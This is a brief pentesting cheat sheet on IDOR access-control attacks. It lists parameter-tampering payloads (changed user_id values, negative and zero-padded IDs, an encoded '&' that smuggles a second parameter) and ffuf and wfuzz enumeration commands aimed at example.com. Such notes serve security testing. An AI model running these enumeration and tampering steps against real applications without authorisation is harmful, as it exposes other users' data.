Exploit Notes

IDOR (Insecure Direct Object References) Attack

Last modified: 2023-08-22

Web

IDOR is a type of access control vulnerability in web applications.

Find Vulnerabilities from HTML Source Code

First check values of attributes on input elements.

<input name="user_id" value="8" >

Then try what will happen when you change the Cookie value in a HTTP header.

Cookie: user_id=12

Change GET Parameters

Manual

/user?id=1
/user?id=2
/user?id=-1
/user?id=00

/admin/posts/1
/admin/posts/-1
/admin/posts/00

/static/1.txt
/static/2.txt
/static/-1.txt
/static/00.txt

Automation

seq 0 100 | ffuf -u https://example.com/user?id=FUZZ -w -

wfuzz -z file,./numbers.txt https://example.com/user?id=FUZZ

Change POST Parameters

address=1&user_id=1
address=1&user_id=2

# URL Encode '&'
address=1%26user_id=2